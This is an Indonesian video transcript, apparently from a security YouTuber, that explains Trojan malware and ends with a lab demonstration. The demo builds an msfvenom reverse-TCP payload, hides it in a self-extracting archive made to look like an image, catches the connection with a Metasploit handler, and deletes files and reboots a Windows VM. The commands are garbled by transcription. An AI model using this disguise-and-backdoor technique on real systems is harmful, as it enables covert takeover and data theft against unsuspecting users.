Oke, halo teman-teman semua, kembali lagi bersama gua Yogi. Di sini gua mau mengucapkan terima kasih banyak buat teman-teman semua yang sudah mau support gua sampai dengan sekarang. Terima kasih banyak juga yang sudah mau mengikuti video gua dari awal sampai dengan sekarang. Terima kasih. Oke, mungkin kemarin gua memberikan sebuah giveaway untuk 2000 likes itu cukup keberatan dan gua reload teman-teman bahwasannya jika video ini tembus sampai dengan 1000 likes, kemungkinan gue bakal ngundi ataupun menghadiahkan 3 akun VPS selama 1 bulan secara gratis ke teman-teman semua. Oke. Dan di materi hari ini kita bakal ngebahas tentang Trojan. Apa sih itu Trojan dan seberapa bahayanya Trojan untuk kalangan masyarakat dan skala besar seperti perusahaan. Kita lanjut aja untuk dalam materinya dan diusahakan teman-teman untuk menonton video ini sampai dengan selesai supaya tidak terjadi kesalahpahaman. Dan note juga nanti kita bakal mencoba untuk mengimplementasinya bagaimana untuk cara kerja si Trojan ini teman-teman. Oke, kita langsung aja masuk ke dalam materinya. Apa itu Trojan? Trojan adalah program jahat yang menyamar sebagai software yang valid. Program ini menyembunyikan malware di dalam file yang ingin Anda download. Misalnya dalam lampiran yang diterima di email, game komputer, lagu, atau film. Virus Trojan seringkali berpura-pura menjadi program biasa namun sebenarnya menyebabkan kerusakan pada perangkat digital. Virus ini membawa malware atau kode berbahaya untuk berbagai tujuan, tapi biasanya selalu berdampak buruk bagi PC atau perangkat. Program ini umumnya bersembunyi di dalam file yang didownload di komputer. Setelah didownload, Trojan akan masuk ke sistem Anda bisa menjalankan fungsinya di dalamnya seperti menghapus, menyalin, atau memodifikasi data. Cara ini belakangan sangat populer untuk mengambil alih kontrol sistem atau perangkat. Parahnya lagi, kini Trojan adalah salah satu serangan yang paling sering terjadi bahkan memakan korban perusahaan-perusahaan besar. Dan ini cukup berbahaya banget. Jadi ya ini untuk penjelasan singkat terkait apa sih itu Trojan ya teman-teman. Selanjutnya kita bakal ngebahas sejarah dari Trojan. Untuk sejarah dari Trojan yaitu setelah mengetahui apa itu Trojan pada skema sebelumnya, mungkin mulai menyadari satu hal. Virus ini sering berpura-pura menjadi program yang tidak berbahaya, demikian juga dengan kuda Trojan atau Troya dalam metodologi Yunani. Dulu pernah ada pertempuran yang disebut Perang Troya antara pasukan Yunani dengan warga kota Troya. Untuk memasuki kota Troya, pasukan Yunani membuat sebuah kuda kayu besar sehingga sebagai hadiah untuk kota Troya. Ternyata beberapa prajurit Yunani bersembunyi di dalam kuda tersebut agar bisa masuk melewati gerbang tanpa hambatan untuk menaklukkan kota Troya. Karena orang-orang yang menerimanya tidak sadar bahwa kuda tersebut adalah tipuan pasukan Yunani pun berhasil menguasai kota yang menyelinap keluar dari dalam hadiah kayu tersebut. Kuda ini disamarkan sebagai sesuatu yang tidak berbahaya, tapi sebenarnya membawa ancaman dan masalah besar. Dan dari sinilah sumber inspirasi virus Trojan tercipta ya teman-teman. Ya sebenarnya masuk akal juga ya kan. Karena virus Trojan ini untuk implementasinya dan cara kerjanya emang menyelinap dari belakang teman-teman gitu. Seperti itu ya untuk perkenalan dan sejarah Trojan. Makanya Trojan ini tercipta namanya terkait kuda Trojan atau Troya dalam metodologi Yunani seperti itu. Oke, untuk cara kerja virus Trojan, tujuan dari cara kerja Trojan adalah mengacaukan perangkat user tanpa diketahui. Program ini membaca password, membuka celah keamanan terhadap virus dan malware, menyalin informasi, bahkan menyandra sistem sebagai bagian dari jaringan. Karena tidak memproduksi dirinya secara independen, Trojan perlu di-download ke komputer seperti program normal lainnya agar bisa menjalankan file.exe dan bertindak sesuai dengan programnya, teman-teman. Maka dari itu, virus Trojan harus selalu tersembunyi. Tanpa disadari, virus ini melacak, merekam, dan menyalin data, serta membahayakan performa jaringan dan perangkat tempatnya diinstal. Seperti itu, teman-teman. Bentuk yang sering disamarkan juga memungkinkan virus ini menjangkau Anda dalam berbagai format, misalnya sebagai lampiran email, pop-up, website, link, atau URL. Program yang diinstal di komputer, game, lagu, atau film yang didownload dari internet. Gak cuma game, lagu, film, ya bisa juga seperti gambar, terus ya apapun itulah ya teman ya yang sering kita download. Aplikasi juga bisa, gitu teman-teman. Untuk jenis-jenis Trojan yang paling umum,
yaitu ada namanya backdoor Trojan. Program ini bertindak seperti pintu gerbang yang membuka pintu belakang di komputer user sehingga penyerang bisa mengambil alih kendalinya. Dengan begitu, jenis Trojan ini bisa mencari data, mendownload virus lain, membuat botnet, dan lain sebagainya. Downloader Trojan jenis ini bisa mendownload file berbahaya lainnya ke perangkat yang diserang dan bisa diupdate dari jarak jauh oleh penyerang yang mengembangkannya. Untuk installer Trojan, seperti namanya, jenis ini mencuri dari komputer yang diserang. Dan selanjutnya ada remote Trojan. Program ini dirancang untuk mendapatkan akses dan kendali penuh secara jarak jauh atas perangkat yang diserang. Dan yang terakhir itu ada namanya DDoS. Serangan yang dilakukan adalah DDoS attack Trojan adalah serangan DDoS dengan tujuan merusak atau bahkan menimbulkan downtime pada jaringan. Program ini akan membanjiri server dengan permintaan meningkatkan trafik dan melemahkan jaringan. Oke ya teman-teman, cukup jelas. Sorry gue agak terbata dan terbelit-belit dalam menyampaikannya. Ya karena emang itu susah sih kalau untuk melatih public speaking dengan baik gitu. Ya oke ya, mungkin udah jelas. Selanjutnya kita bakal jenis-jenis Trojan yang paling umum di kalangan masyarakat, seperti fake antivirus Trojan. Berpura-pura menjadi program antivirus, Trojan ini menampilkan peringatan ancaman seolah-olah komputer user sudah terinfeksi malware dan membutuhkan perlindungan ekstra. Tujuannya adalah menyebabkan kepanikan dan seringkali membuat orang membeli antivirus palsu padahal justru malah menimbulkan masalah yang lebih besar, teman-teman. Yaitu yang kedua ada namanya rootkit Trojan. Tujuan rootkit Trojan adalah menyembunyikan data dan file dari perangkat sehingga program ini tidak bisa ditemukan dan tetap bisa menjalankan aksinya lebih lama. Terus yang ketiga ada ransom Trojan. Jenis Trojan ini menyandera komputer, mengubah data, dan bahkan menimbulkan kerusakan pada perangkat. Anda hanya bisa memperbaiki atau mendapatkan data kembali setelah membayar tebusan. Dan yang keempat, yaitu ada namanya exploit Trojan. Kalau ada kerentanan pada program atau aplikasi di perangkat Anda, jenis Trojan ini akan memanfaatkan peluang tersebut untuk melancarkan serangan. Terus yang kelima, yaitu adalah game thief Trojan. Sesuai namanya, jenis Trojan ini mencuri data dan informasi dari pengguna game online, teman-teman. Terus yang terakhir itu ada namanya spy Trojan. Apabila diinstal di perangkat malware, ini tetap tersembunyi, namun akan memata-matai Anda saat menjelajah internet, mengintai akses Anda, mengambil screenshot, dan melacak data yang Anda ketikkan di keyboard. Ini seperti keylogger, ya kan teman-teman. Yang terakhir ini seperti keylogger, yaitu bisa memantau untuk teman-teman itu ya gerak-gerik untuk mengakses internet apa aja gitu teman-teman, seperti itu ya. Nah, ini adalah jenis Trojan yang paling umum yang kalian temukan di kalangan masyarakat gitu teman-teman, ataupun di perusahaan. Ya mungkin case-case ini banyak dijumpai lah. Yang kemarin juga ransomware kan seperti itu. Selanjutnya untuk contoh serangan Trojan yang pernah terjadi ya teman-teman, yaitu namanya Rachni Trojan, menginfeksi perangkat melalui ransomware atau tool seperti CryptoJacker yang digunakan untuk menambang mata uang kripto. Yang kedua ada namanya Tiny Banker, dikembangkan oleh para hacker untuk mendapatkan data keuangan. Serangan ini sangat populer setelah menyerang beberapa bank di Amerika Serikat. Yang ketiga ada namanya Gbot atau Zeus, kumpulan malware dan tool yang menyasar layanan keuangan dan data akun. Program ini menyimpan urutan yang diketikkan oleh pengguna sehingga menemukan password, kredensial login, dan data sensitif, dan ini berbahaya banget. Ini adalah jenis serangan yang terjadi ataupun yang pernah terjadi di dunia ya teman-teman, di dunia pokoknya di lingkungan kita lah, di sekitar kita gitu teman-teman, ataupun di perusahaan-perusahaan besar ya. Pencurian keuangan, pencurian data bank, terus ya pencurian uang kripto, itu banyak tuh berita-beritanya kan ya teman-teman, bisa temuin di ya Google ataupun sosial media gitu kan, seperti itu. Selanjutnya yaitu cara melindungi data diri dari virus Trojan. Yang pertama, gunakan program antivirus yang canggih. Software ini akan memadai komputer Anda serta mengidentifikasi kemungkinan ancaman seperti virus dan malware. Jalankan proses scan dan diagnostik sesering mungkin dan diagnostik sesering mungkin atau konfigurasi antivirus agar melakukan scanning rutin perangkat teman-teman. Terus yang kedua ada namanya update OS perangkat. Segera perbarui OS perangkat Anda
ketika ada update terbaru, bagaimana celah keamanan dalam program atau sistem yang tidak segera diberi patch bisa menjadi kerentanan yang dieksploitasi oleh Trojan. Dan ini sering gue lakukan ketika gue di perusahaan teman-teman, yaitu update OS di semua server gitu. Dan itu berfungsi untuk ya keamanan gitu teman-teman. Seperti itulah kalau jika kalian nanti bekerja di bidang IT gitu. Yang ketiga yaitu cermati website yang dibuka. Beberapa software keamanan akan menampilkan perangkat ketika Anda mengakses halaman web yang tidak aman. Jangan memaksa mengunjungi website yang memiliki indikasi berbahaya karena memungkinkan memuat link Trojan, misalnya dalam iklan, pop-up, dan sejenisnya. Dan ini biasanya ya pemerintahan itu sering banget kan kayak kebobolan-kebobolan. Ya karena itu teman-teman, karena mereka ya sering membuka website-website yang nggak jelas ya. Ya kurangnya edukasi sih sebenarnya dari Kominfo. Seharusnya mereka mengadakan sebuah webinar ataupun ya sosialisasi nggak cuma ke pemerintahan, ke lingkungan masyarakat juga seperti itu. Gue udah sering banget di video gue note ya kan, supaya didengarlah kepada mereka gitu bahwasannya penting banget itu untuk sosialisasi seperti ini. Yang keempat itu adalah buat password akun unik dan rumit. Metode pencegahan ini memang terlihat sederhana tapi sangat penting untuk keamanan internet Anda. Sebenarnya langkah ini juga tidak hanya berkaitan dengan Trojan, tapi memang harus menjadi produser dasar. Gue sudah sering banget semua video gue nyaranin teman-teman untuk ngebuat sebuah password itu yang unik dan rumit teman-teman. Terus yang kelima, lakukan backup data secara rutin. Ini gue lakukan ketika di perusahaan, itu gue pasti melakukan namanya ada backup lah. Backup data-data semuanya ketika nanti kena serangan dari ransomware ataupun virus-virus yang lain. Setidaknya kita memiliki data backupan yang sebelumnya itu tidak terkena gitu teman-teman. Kita bisa restore kembali datanya walaupun yang sudah terkena itu bisa ya kehilangan beberapa ataupun kerugian di perusahaan, setidaknya kan meminimalisir kerugian dari perusahaan teman-teman. Makanya itu perlunya kita melakukan backup data. Yang keenam yaitu adalah evaluasi performa perangkat. Meskipun sering kali tersembunyi dan menyamar, perlu diingat bahwa Trojan adalah program yang bisa mempengaruhi performa komputer Anda kapan saja teman-teman, seperti itu. Terus next, yang ketujuh adalah hindari mendownload file bajakan. Meskipun bajakan bukanlah sumber utama penyebar virus, program dan media bajakan tidak selalu aman dan bisa membawa malware. Jadi berhati-hatilah saat mendownload file dari orang asing atau sumber yang meragukan. Dan ini banyak banget yang terjadi di lingkungan masyarakat Indonesia ya, senangnya gratisan. Dan biasanya mereka ngedownload dari sumber-sumber yang tidak terkenal teman-teman, yang tidak pasti gitu. Jika kalian mau nge-crack seperti ini, kan ini tukang crack nih ya, tukang crack itu banyak mesti yang nge-crack aplikasi-aplikasi supaya bisa digunakan secara gratis gitu kan. Ya itu hati-hati ya teman-teman, di situ takutnya ada virus Trojan. Silakan kalian aktifkan antivirus kalian dan lakukan scanning gitu untuk mengecek apakah di situ ada malware-nya atau tidak gitu. Terus selanjutnya yang ke-8 ada telusuri software yang terinstall di perangkat. Silakan cek apa saja aplikasi dan file yang ada di komputer Anda. Mungkin Anda akan menemukan sesuatu yang pernah Anda download secara tidak sadar, dan ternyata file tersebut adalah Trojan atau malware yang di-download melalui pintu belakang backdoor teman-teman. Yaitu yang gue bilang ya, sering melakukan scanning aja teman-teman. Kalau misalkan kalian punya antivirus di dalam laptop kalian ataupun komputer kalian ataupun yang di server kalian lah gitu, banyak kok antivirus yang sudah terkenal gitu. Juga gunakan Sophos ataupun yang lain lah. Kalau itu kan yang berbayar ya. Selanjutnya yaitu nomor 9, scan website Anda dari malware. Apabila Anda sudah mempunyai website dan yakin bahwa website Anda mengandung malware yang mungkin membahayakan pengguna, scan website Anda dan gunakan beberapa software malware remover terbaik ya teman-teman. Oke, kesimpulannya, Trojan atau virus Trojan horse adalah program yang bisa menyebabkan kerusakan serius pada perangkat Anda. Virus ini menyamar sebagai program yang tidak terlihat biasa saja, namun ternyata membawa malware yang bisa mengambil alih kendali perangkat, mencuri data, dan menghapus file teman-teman. Jadi yang ini untuk kesimpulan yang gue dapat dari materi ya kan, seperti ini ya untuk cara kerja si virus Trojan gitu teman-teman. Jadi dia bisa mengontrol, terus bisa mengambil data, ya semuanya. Kalau dia bisa mengontrol, bisa mengambil data, menghapus data, dan bisa menggerakkan sesuatu yang ada apa hak ataupun kehendaknya si pengguna gitu teman-teman, seperti merestart ataupun dan lain-lain lah. Oke, itu aja ya mungkin untuk materi ini. Terima kasih teman-teman, cukup sampai sini aja. Enggak, kita bakal coba praktek dan implementasinya bagaimana sih cara kerja si virus Trojan gitu. Dan ini berbahaya banget, dan gua disclaimer ya, jangan digunakan untuk
tindakan kejahatan ya teman-teman, karena ini gue cuma untuk mengedukasi bahwasanya kalian lebih ya berhati-hati terkait apapun itulah. Kalau misalnya kalian mau nge-crack ataupun ya tidak, kalau gue sih tidak menyarankan kalian menge-crack ya, karena ya kalian itu harus membeli karya dari originalnya orang lain gitu. Misalnya contoh gue buat aplikasi ya langsung dari sumber yang gue buat gitu, jangan dari sumber yang duplikat lah pokoknya gitu ya teman-teman, seperti itu. Kita akan masuk ke implementasinya. Coba kita cek dulu ini video udah berapa lama untuk pembahasan materi. Ini udah 15 menit ya, udah cukup lah ya. Dan gue pikir ya kalian sudah paham semua sih terkait apa yang gue udah sampaikan, dan cukup familiar juga terkait Trojan ini gitu teman-teman. Selanjutnya kalian coba buka Oracle VirtualBox ataupun Kali Linux kalian, dan kalau misalnya kalian belum download, silahkan kalian download dari video yang sudah gue buat bagaimana cara instalasi Kali Linux di dalam VirtualBox teman-teman. Setelah itu kalian masuk ke dalam mode root, sudo su, terus masukkan password kalian. Nah ini kalian udah masuk ke dalam mode root. Terus selanjutnya kalian ketikkan ms v venom minp windows. Kita di sini kita bakal ngebuat pilot 64 meter reverse tcp lhost, lhost sama dengan terus lportnya di sini gue pakai 44 aja, lport minv xe, ini format filenya xe, kita pakai xe min 0. Terus namanya di sini kita buat testing aja, testing.exe. Oke. Di sini gua enter aja teman-teman. Jadi nanti si MSC Venomnya bakal ngebuat payload ya kan, yang bakal berfungsi untuk ya ataupun membuat backdoor lah gitu. Yang nanti kedepannya kita bakal memasang pilot ini untuk ke dalam gambar gitu teman-teman, seperti itu. Nanti gue bakal mempraktekkan. Oke, selanjutnya ini kita sudah berhasil untuk ngebuat pilotnya. Terus yang kita butuhkan yaitu kita langsung masuk aja di sini. MSV console, kita enter. Kita masuk ke dalam Metasploit teman-teman. Kita tunggu dulu beberapa saat sampai dengan, nah ini udah masuk. Oke, kita tunggu dulu ini sampai dengan runningnya selesai ya teman-teman. Ini lagi proses loading. Terus selanjutnya kita coba pergi ke home sama gitu. Nah ini kita butuh namanya testing.exe, kita copy aja teman-teman. Selanjutnya kita pindahkan ke dalam, nah ini sorry gue jelaskan dulu. Jadi gue ngebuat sebuah Windows di sini, target Windows. Nah ini yang bakal jadi targetnya nanti teman-teman. Oke, di sini gue ngebuat sebuah gue copy paste di dalam server Windows. Nah ini teman-teman di sini testing. Oke, dan selanjutnya coba gue download file gambar. Nanti file gambar ini bakal gue sisipin si backdoor ya teman-teman. Oke, gambar One Piece ya teman-teman, gambar One Piece. Nah nih, oke. Kita tunggu dulu beberapa saat. Ini coba kita download. Ini terlalu besar apa ya, cukup lah ya. Ini kita save image as teman-teman. Kita tunggu dulu sampai muncul. Nah ini kita ganti One Piece. Ini kita download, ini kita save aja teman-teman. Oke, ini kita save. Selanjutnya yang kita lakukan, kita rubah dari file JPEG to ISO untuk formatnya teman-teman. Kita tunggu dulu, kita masukkan file JPEG nya ke ISO, kita convert ya teman-teman.
Ini One Piece. Oke. Kita tunggu dulu beberapa saat sampai dengan selesai untuk downloadnya. Ini lagi proses booting, kita convert aja teman-teman, langsung kita upload. Oke. Nah, ini lagi proses converting, kita tunggu aja. Oke. Apakah ini udah selesai? Bentar ya teman-teman. Nah, ini udah selesai, kita download ya teman-teman. Oke, ini masuk ke dalam sini. Terus kita pergi ke file explorer. Nah, testing ini, wait ya, ico testing. Oke, ini gua taruh di dalam desktop ya, biar enak ya, biar kelihatan aja. Sebenarnya gua Ctrl C, terus gua paste di sini. Nah, ini ya teman-teman. Selanjutnya ini gua selection semua antara si file gambar dan si pilot yang sudah kita buat teman-teman. Tambahkan untuk add to arsif teman-teman, silakan. Terus centang create sfx arsif teman-teman. Nah ini desktop exe. Oke, ini biar aja namanya seperti ini, ataupun kita bisa ganti, nggak apa-apa, bisa juga One Piece. Oke, selanjutnya yang kita lakukan ke advance, terus ke sfx option, terus kita ke setup. Ke setup kita lakukan run after, berarti One Piece ya, bener gak? Coba kita cek lagi. One Piece dot jpeg ya. Selanjutnya yaitu testing.exe ya, bener ya, testing.exe ya teman-teman. Oke, testing.exe. Selanjutnya yaitu kita checklist yang unpack to temporary folder, terus kita hide semuanya teman-teman. Terus oke, ini modul ini nggak usah. Terus ini udah berhasil text addition. Nah ini teman-teman ya, text and icon teman-teman. Iconnya kita masukin yang tadi one piece dot icon. Ini one piece dot icon, ini one piece nih pokoknya, format jpeg-nya icon. Ico. Terus ini udah semua, modules udah, ini udah. Terus update-nya nih ya, untuk update-nya kalian untuk override modenya itu pakai override all files ini teman-teman. Kita oke aja. Selanjutnya ini udah semua, kita oke ya teman-teman. Oke, nah ini bakal kebentuk ya file gambarnya ya teman-teman. Oke, ini udah kebentuk ya. Selanjutnya yang kita lakukan, kita bakal pergi ke si ini Kali Linux-nya. Nah, ini udah selesai. Terus yang kita lakukan yaitu ini Ctrl L dulu teman-teman. Kita udah masuk ke MSV console. Selanjutnya yang kita lakukan yaitu set use pilot slash handler multi handler teman-teman, seperti ini. Bener nggak ya buat teman-teman? Sorry gue mau untuk memastikan aja bener. Oh salah, use exploit multi handler teman-teman. Nah gunakan. Nah ini udah masuk. Terus masuk ke dalam multi handler, kita lakukan namanya setting ini, atau bisa teman-teman lihat ini di sini. Kita cek show options. Nah ini belum ada tuh, belum listening tuh IP-nya kan. Kita masukkan ataupun kita setting set lhost sama dengan set lhost 192.168.0.115. Kita enter. Ini sorry pakai T. Nah ini berhasil. Terus lakukan lagi set portnya teman-teman, L port 4444. Oke. Nah kita show lagi, coba kita masukkan, kita coba ngecek. Nah ini ya teman-teman, ini udah berhasil ya, lhost ini udah listen. Oke, selanjutnya kita jalankan run. Kita ketikkan run teman-teman. Oke, bentar ya, bisa apa saja. Nah kita ketikkan run. Oke, untuk menjalankan si Metasploit teman-teman. Oke, kita tunggu dulu beberapa saat ya teman-teman. Oke, ini lagi loading.
kita ke dalam Windows. Ini lagi loading ya. Oke, ini tadi ya, ini file ini yang bakal nanti kita buka. Nah ini teman-teman ya, ini udah tinggal nunggu untuk si ininya, si targetnya untuk membuka. Nah ini gua contohin seperti ini. Ketika gua buka file ini teman-teman perhatikan. Oke, aduh ini error ya, apa ini, gua salah format. Oke, nah ini teman-teman, oh comment cell is not valid, the close 117. Oke, bentar ya teman-teman, seharusnya ini berjalan 117. Bentar ya, kita coba lagi. Nah gimana sih? Kita tunggu dulu. Oh, close, comment session is not valid, session not valid. Bentar, set playline. Oh sorry teman-teman, kita kekurangan satu. Oke, kita lakukan juga set playlet. Aduh, nih ya teman-teman, reverse TCP. Gue lupa. Nih teman-teman ya, masukkan keyboard, atasan nggak mau. Nah ini teman-teman, kita harus nyeting pilot dulu ke Windows baru bisa. Kita jalankan lagi exploit. Kita tunggu dulu beberapa saat. Oke, ini masih di sini ya. Oke, agak lebih besar ya. Oke, gini lah ya, biar kelihatan enak. Kita tunggu dulu teman-teman sampai dengan running kembali. Sorry ya, gue ada kelupaan. Nah ini ya, ini udah mulai. Ini tinggal menunggu si target untuk ngebuka. Oke. Jadi ketika nanti kalian ini biasanya di share di browser ya kan, banyak-banyak kalian tiba-tiba nge-download file nih, terus kalian ngebuka si gambarnya. Ini gue salah salah penamaan. Sorry ya teman-teman, salah penamaan. Ini gue oke aja. Nah nih, ini otomatis gue udah berhasil masuk ya teman-teman. Tuh, metaprinter dan langsung masuk ke dalam si server gue gitu. Inilah bahayanya teman-teman. Ini kalau misalnya ini gue salah setting, seharusnya ini terbuka ya teman-teman. Ini bahayanya terkait virus Trojan karena dia memasang sebuah backdoor di dalam file gitu teman-teman. Ini berupa bisa aplikasi, terus file musik dan gambar, dan ini bisa gue contohin melalui gambar untuk implementasinya. Dan apa aja yang gue dapat dan gue bisa ngotak-atik di sini size info. Nah teman-teman, tuh gue bisa ngecek infonya untuk servernya ini yang kita dapatkan targetnya itu apa gitu kan. Ini adalah sebuah Windows Server 2016, terus workgroup, ini adalah domainnya, domain. Oke, terus apa lagi yang bisa gue lakukan ya teman-teman? Oke, kita coba ke head. Bentar, ini udah berhasil masuk ya teman-teman. Nah coba, jadi gue ke head, ini gue Ctrl L dulu. Oke, gue ke head. Oke, di sini banyak banget yang bisa dilakukan oleh ketika kita udah masuk ke dalam si server gitu teman-teman. Coba gue jalankan di sini. Oke, cat cd, apakah gue bisa melakukan cd PowerShell? Seharusnya bisa ya. Bentar ya teman-teman. Oke, kita cari-cari dulu komandannya. Config. Untuk jaringannya kita bisa sih sebenarnya. Kita coba cek di sini. Bentar ya. Ini HP. Sistemnya ini kita copy dulu ya semuanya teman-teman, biar kita enak bacanya untuk di notepad lah. Kita copy dulu ya, kita copy dulu semuanya, dan ntar kita bisa menggunakannya secara mudah gitu. Oke, gue juga nggak terlalu hafal terkait sintak, makanya sorry ya kalau teman-teman. Copy, kita masukkan di sini teman-teman. Kita buat file baru, neofile, don't save lah. Nah ini teman-teman ya. Oke, ini kita perbesar, ini nggak usah. Oke, ini kita Ctrl L aja, kita bersihkan lagi. Oke, ini si Windows ya. Ini Windows kita nggak perlu deh, kita perlu cuman si ini aja. Bentar. Nah ini ya, bentar ya teman-teman. Oke, nih apa aja yang bisa kita lakukan? Yang pertama, kita bisa mengganti ini untuk contoh, ini untuk si command ya. Coba kita lihat untuk ini belum masuk ya. Bentar, gua harus
Ini untuk tadi. Nah, ini kita bisa menggunakan save info, bisa nge-reboot, terus bisa nge-kill juga. Terus ya ini banyak banget sih. Bentar, coba kita cek si IP config-nya. Nah, ini teman-teman ya. Tuh bisa kebaca ya semuanya. Tuh, untuk Interforce 3, Interforce 1, Interforce 3, 4, 5, 6. Tuh, teman-teman. Tuh, bisa kebaca semuanya. Terus kita juga bisa melakukan masuk ke dalam foldernya langsung. Bagaimana caranya? Coba kita cek lagi background menu current session. Coba kita cek background ya. Di sini background. Aduh, sorry. Kita background. Oke. Oh, season 3. Ini kita masuk ke dalam background season 3, teman-teman. Terus apa lagi ya? Season. Coba kita ketikkan sini season. Bentar ya. Nah, ini teman-teman. Oke, target metaparameter untuk activationnya ini idea di 3. Bentar. Terus yang kita bisa lakukan yaitu apa lagi ya? Migrate coba. Migrate. Oke, ini terputus ya. Bentar. Oh ya, teman-teman, terputus. Kita masuk lagi bentar ya. Ini masuknya ke run juga kita nih. Sorry ya. Coba kita running lagi, teman-teman. Seharusnya nggak perlu ini ya. Kita tunggu dulu. Habis itu coba kita lakukan cd checksum del dir. Coba kita lakukan dir ya, directory. Oke, ini kita coba lakukan. Buka lagi. Ini kita oke aja. Oke. Ini teman-teman. Oke. Selanjutnya, nah kita juga kita klik dir. Nah, ini kita berada di C user Muhammad app data local temp res. Nah, teman-teman ya, seperti ini ya. Terus coba kita masuk ke cd di titik. Kita balik, terus kita dir lagi. Wah, ini banyak banget tuh. Oke, teman-teman. Kita dir lagi. Ini banyak banget tuh untuk sectionnya. Tuh. Oke, kita ngebuka Chrome tuh tadi. Itu bisa kebaca semua ya, teman-teman. Dan ini bisa dimodifikasi ya. Dan kita juga bisa ngebuat file di dalam si Windows dan bisa ngotak-atik juga. Coba kita jalankan reboot nih ya. Coba kita jalankan reboot. Jangan, ntar kita otomatis mati. Nantilah kita bahas-bahas lagi ya. Terakhir aja untuk reboot. Nah, selanjutnya yang bisa kita lakukan yaitu kita bisa melakukan download. CP bisa juga copy. Bentar, ini Ctrl L dulu deh. Oh, nggak bisa ya, kita masuk ke metaparameter. Bisa Ctrl, bisa. Wait. Oke, bentar. Ya, oke, teman-teman. Selanjutnya kita bisa melakukan apa aja? Bisa nge-sleep, terus ini kalau nge-sleep bakal tidur nanti. Nah, ini kita coba cek info ya. Kita info apa? Oh, print informasi export nggak jelas nih anjir. Use taruh checksum. Coba cek sampel. Cek sum. Oke. File 1, file 2, file 3 yang digunakannya. Terus untuk ketik ini untuk del apa? Del. Oh, RM untuk delete, teman-teman. Terus coba kita masuk ke LLS ya. Oh, nih ya teman-teman, kita banyak banget tuh yang didapat ya. Lalu coba, jangan LLS nih, LS cd cat. Coba kita cat itu buat ngeliat sebenarnya. Cat. Gak usah, kita clear lagi aja, terus kita LS coba ya. Nah, ini teman-teman ya, seperti ini ya. Banyak banget tuh ya. Kita berada di temp. Coba kita masuk ke dalam ininya cd, terus cd lagi. Kita bentar. Masuk ke dalam, aduh sorry.
Ini Ctrl L, coba kita pwd, kita berarti app data teman-teman. Coba kita masuk ke lagi sampai ke user ya teman-teman. Coba pwd, kita ke user, terus kita ls, kita berada di mana? ls administrator Muhammad Yogi. Nah coba kita masuk ke dalam cd slash Yogi. Oke, kita masuk ke dalam, aduh nggak bisa, oh bisa ya, oh nggak bisa, bentar, oh bisa ya. Step device operation di sini karena kayak gue salah deh, bentar teman-teman. Nah gini, bisa nggak? Oh bisa, bisa nggak sih? Oh bisa, bentar, seharusnya gini. Gua nggak tahu, bentar ya. Public, cd public, ini sih seharusnya. Oh bisa teman-teman. Nah bisa. Selanjutnya kita masuk ke dalam download, cd download. Ini kita clear dulu deh, biar kelihatan enak. Sorry. Aduh. ls, terus kita masuk ke dalam cd download. Coba kita hapus sebuah file ya di dalam Windowsnya. Apakah berhasil? Salah nih cok, anjir. Astagfirullahaladzim, kita kena ini deh salah. cd downloads teman-teman, downloads. Nah ini masuk, terus kita ls. Nah ini teman-teman, ini ada file desktop ini apa desktop ini? Coba kita ke ini deh, Windows Server ya teman-teman. Kita ke Windows Server, terus di file download, file public dari PC, terus local disk C, terus ke user, terus ke public. File download ada, public download nggak ada coy. Oke, jadi jangan di sini deh, kita coba mundur lagi ke dalam file gua, ke directory username gua aja deh. Nah ini ya, kita masuk ke Ctrl, kita masuk ke dalam cd Muhammad Yogi ls, banyak banget ya teman-teman. Coba kita masuk ke dalam cd downloads teman-teman. Yang ini Ctrl L, masuk. Nah ini ya teman-teman, ini ada namanya onepiece.jpg. Nah coba gua hapus rm onepiece.jpg. Nah kita ls, udah nggak ada ya onepiece.jpg ya, ini ya teman-teman. Coba kita cek di dalam Windows servernya, apakah bisa terhapus downloads. Oke, udah nggak ada ya, adanya icon teman-teman, icon dan testing JPEG. Coba kita cek lagi apakah benar di sini. Nah ini benar ya, icon dan testing .jpeg, berarti file ini udah terhapus teman-teman, seperti itu. Dan kita juga bisa menjalankan reboot. Nih, kalau gua reboot, tuh rebooting, otomatis servernya bakal nge-reboot. Nih ya teman-teman, kita cek aja. Tuh, dia bakal nge-reboot, restoring, seperti itu. Dan ketika dia bakal aktif lagi ya bakal nyala lagi dan bisa digunakan lagi gitu teman-teman. Nah itulah teman-teman berbahayanya terkait virus Trojan, dan bagaimana cara menangkalnya. Silakan kalian mengaktifkan antivirus masing-masing pengguna gitu, dan menggunakan ya antivirus gitu. Nyalakan si firewall kalian tuh dihidupkan, jangan sampai dimatikan gitu. Karena ini gue mematikan firewall. Kemarin tuh gue udah coba untuk langsung nembak ke PowerShell ya gitu. Itu bisa menggunakan payload dan tanpa harus mematikan si firewallnya gitu. Kalau untuk masalah JPEG itu kemungkinan bakal kedeteksi gitu teman-teman, bakal ada notif nanti ya. Contohnya seperti ini bakal 2000 selesai. Nah seperti itulah ya. Ini daripada video kelamaan, udah berapa menit ya? 39 menit. Daripada video ini cukup lama ya, mungkin penjelasannya seperti itu ya teman-teman. Jadi sangat berbahaya banget untuk virus Trojan. Jadi apapun itu ya teman-teman lakukan. Jadi misalkan nih ngebuka ataupun mendownload file secara sembarangan, aplikasi secara sembarangan, dan itu sangat berbahaya banget. Siapa tahu di dalam itu disisipin namanya payload
ataupun yang lebih dikenal itu Trojan, virus Trojan ya teman-teman. Dan itu bisa disisipkan di mana aja, di musik, terus di aplikasi, terus di email dan lain-lain. Banyak lah ya teman-teman. Itulah berbahayanya virus Trojan. Mungkin itu aja yang bisa gue sampaikan terkait materi gue di hari ini. Ya, gue harap juga jika video ini tembus sampai dengan 1000 likes ya kan, kemungkinan kita bakal mengadakan sebuah giveaway untuk teman-teman semua. Ya, 3 akun VPN secara gratis selama 1 bulan ya teman-teman. Ya, itu aja sih yang gue bisa sampaikan. 1000 likes lah, 1000 lah, nggak apa-apa, kemarin cukup lah, bisa kan. Itu aja ya yang bisa gue sampaikan dan semoga bermanfaat. Gue anak juga gunakan video ini secara bijak dan jangan digunakan untuk tindakan kejahatan, karena gue jujur untuk mengedukasi dan bagaimana cara kerja seorang hacker gitu untuk mencuri data dan bagaimana cara untuk menghindarinya, seperti itu ya. Dan lebih berhati-hati, karena kalau misalnya kita tidak mengimplementasinya dan kita cuma menjelaskan secara teoritis, dan kemungkinan kalian juga tidak percaya gitu bahwasanya wah ini bohong, ini bohong, ini bohong, seperti itu. Sedangkan yang sudah dijelaskan secara praktek aja masih ada yang bilang hoax ya kan, seperti itu. Ya itulah orang Indonesia yang minimnya literasi dan membaca buku dan melek terkait dunia teknologi, jadi mudahnya dibohongin ataupun 